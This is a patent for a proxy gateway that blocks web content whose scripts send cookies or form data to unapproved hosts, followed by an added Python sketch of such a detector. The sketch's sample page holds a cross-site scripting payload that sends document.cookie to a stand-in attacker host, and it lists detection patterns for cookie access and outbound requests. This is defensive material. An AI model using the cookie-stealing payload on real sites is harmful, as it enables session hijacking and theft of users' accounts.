Communication gateway apparatus, communication gateway method, and program product
Abstract
When a proxy server receives contents transferred from a Web server to a Web browser, the proxy server extracts from the contents a script program having a function of sending cookie information stored in the Web browser from a client computer to an external transmission destination. When the script program is received, the proxy server determines whether transfer of the contents to the client computer is permitted, and only when transfer is permitted, transfers the contents to the client computer.
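The following Python sketch is an added example, not code from the patent or its assignee. It walks through the pipeline the abstract describes: the extraction unit pulls script programs out of the received content, the inspection unit detects whether a script has a function that transfers client-stored information (or rewrites where a form submits, or requests external content) and identifies the destinations it names, and the determination unit collates those destinations against a stored allowlist of authentic hosts so the gateway forwards the content only when every destination is permitted. The allowlist, the detection patterns, and the two sample pages are constructed assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist of "authentic" transfer/request destinations (hostnames).
# Constructed for this example; a real gateway would load it from its storage unit.
PERMITTED_HOSTS = {"shop.example", "cdn.example"}

# Script behaviours that indicate client-stored information or form data may leave
# the page: cookie access, rewriting a form's submission target, navigation, and
# outbound requests. Constructed heuristics, not the patent's own rules.
TRANSFER_PATTERNS = (
    re.compile(r"document\.cookie"),
    re.compile(r"\.action\s*="),
    re.compile(r"location(?:\.href)?\s*="),
    re.compile(r"\.src\s*="),
    re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon"),
)
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)


class _ScriptExtractor(HTMLParser):
    """Extraction unit: collects inline <script> bodies and external script src URLs."""

    def __init__(self):
        super().__init__()
        self.inline = []
        self.external = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.external.append(value)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def extract_scripts(html):
    """Return (inline script bodies, external script URLs) found in the content."""
    parser = _ScriptExtractor()
    parser.feed(html)
    parser.close()
    return parser.inline, parser.external


def identify_destinations(script):
    """Inspection unit: if the script has a transfer function, return the hosts it
    names as destinations; otherwise return an empty set."""
    if not any(pat.search(script) for pat in TRANSFER_PATTERNS):
        return set()
    hosts = set()
    for url in URL_RE.findall(script):
        host = urlsplit(url).hostname
        if host:
            hosts.add(host)
    return hosts


def inspect_content(html, permitted=PERMITTED_HOSTS):
    """Determination unit: collate every identified destination with the allowlist.
    Returns (transfer_permitted, offending_hosts). Relative URLs name no host and are
    treated as same-origin here, so they never block the transfer on their own."""
    inline, external = extract_scripts(html)
    offending = set()
    for script in inline:
        offending |= {h for h in identify_destinations(script) if h not in permitted}
    for src in external:  # external content requests (script src) are request destinations
        host = urlsplit(src).hostname
        if host and host not in permitted:
            offending.add(host)
    return (not offending, offending)


# Constructed sample contents (not taken from the patent).
BENIGN_CONTENT = """<html><body>
<form id="f" action="https://shop.example/checkout"><input name="q"></form>
<script>document.getElementById("f").action = "https://shop.example/checkout/v2";</script>
<script src="https://cdn.example/app.js"></script>
</body></html>"""

INJECTED_CONTENT = """<html><body>
<p>Search results for: <script>fetch("http://evil.example/c?" + document.cookie);</script></p>
</body></html>"""

if __name__ == "__main__":
    for name, content in (("benign", BENIGN_CONTENT), ("injected", INJECTED_CONTENT)):
        ok, hosts = inspect_content(content)
        print(f"{name}: {'forward' if ok else 'block'} {sorted(hosts)}")
```

The regex-based inspection is a stand-in for whatever parsing the real inspection unit performs; its limitation is the same one any such gateway faces, namely that destinations assembled at run time (string concatenation, obfuscation) do not appear as literal URLs, so a gateway that only allowlists literal hosts should treat a script that touches cookies or form targets without naming any host as a case for stricter policy rather than silently permitting it.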
Claims (27)
1. A communication gateway apparatus to be coupled between a server and a client, comprising:
   a reception unit configured to receive a content transferred from the server to the client;
   an extraction unit configured to extract a script program from the received content;
   a storage to store transfer destination information representing a plurality of transfer destinations designated as authentic;
   an inspection unit configured to inspect the script program to detect that the script program has a function of transferring any one of information stored in the client and the received content, thereby identifying at least one transfer destination of the information;
   a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified transfer destination of the information with the plurality of transfer destinations of the destination information; and
   a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted.
   (Dependent claims: 2, 3, 4, 5, 22, 23, 24, 25)

6. A communication gateway apparatus to be coupled between a server and a client, comprising:
   a reception unit configured to receive a content having an input form and transferred from the server to the client;
   an extraction unit configured to extract a script program from the received content;
   a storage to store transfer destination information representing a plurality of transfer destinations designated as authentic;
   an inspection unit configured to inspect the script program to detect that the script program has a function of changing a transmission destination of the input form, thereby identifying at least one changed transfer destination of the input form;
   a determination unit configured to determine whether or not transfer of the content is permitted, by collating the changed transfer destination of the input form with the plurality of transfer destinations of the destination information; and
   a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted.
   (Dependent claims: 7, 8, 9)

10. A communication gateway apparatus to be coupled between a server and a client, comprising:
   a reception unit configured to receive a content having a first input form and transferred from the server to the client;
   an extraction unit configured to extract a script program from the received content;
   a storage to store request destination information representing a plurality of request destinations designated as authentic;
   an inspection unit configured to inspect the script program to detect that the script program has a function of requesting an external content having a second input form to be used in place of the first input form, thereby identifying at least one request destination of the external content;
   a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified request destination of the external content with the plurality of the request destinations of the destination information; and
   a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted.
   (Dependent claims: 11, 12, 13)

14. A communication gateway apparatus to be coupled between a server and a client, comprising:
   a reception unit configured to receive a content having a form and transferred from the server to the client;
   an extraction unit configured to extract a script program from the received content;
   a storage to store request destination information representing a plurality of request destinations designated as authentic;
   an inspection unit configured to inspect the script program to detect that the script program has a function of requesting an external content having an input form to be inserted within the form, thereby identifying at least one request destination of the external content;
   a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified request destination of the external content with the plurality of the request destinations of the destination information; and
   a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted.
   (Dependent claims: 15, 16, 17)

18. A communication gateway apparatus to be coupled between a server and a client, comprising:
   a reception unit configured to receive a content transferred from the server to the client;
   an extraction unit configured to extract a script program from the received content;
   a storage to store transfer destination information representing a plurality of transfer destinations designated as authentic;
   an inspection unit configured to inspect the script program to detect that the script program has a function of adding an input form to the received content, and a function of transferring the input form, thereby identifying at least one transfer destination of the input form;
   a determination unit configured to determine whether or not transfer of the content is permitted, by collating the identified transfer destination of the information with the plurality of transfer destinations of the destination information; and
   a transmission unit configured to transmit the content to the client only when the determination unit determines that transfer is permitted.
   (Dependent claims: 19, 20, 21)

26. A method of affording security of communication between a vulnerable server and a client, comprising:
   receiving a content transferred from the vulnerable server;
   extracting a script program from the received content;
   inspecting the script program to identify a transfer destination of information, where transferring the information is caused by the client executing the script program;
   collating the identified transfer destination of the information with a permitted transfer destination list; and
   transmitting the received content to the client only if the identified transfer destination of the information is within the permitted transfer destination list, so as to prevent the information from illicitly transferring to a malicious server.

27. A computer program product for affording security of communication between a vulnerable server and a client, comprising:
   means for instructing a computer to receive a content transferred from the vulnerable server;
   means for instructing the computer to extract a script program from the received content;
   means for instructing the computer to inspect the script program to identify a transfer destination of information, where transferring the information is caused by the client executing the script program;
   means for instructing the computer to collate the identified transfer destination of the information with a permitted transfer destination list; and
   means for instructing the computer to transmit the received content to the client only if the identified transfer destination of the information is within the permitted transfer destination list, so as to prevent the information from illicitly transferring to a malicious server.

Specification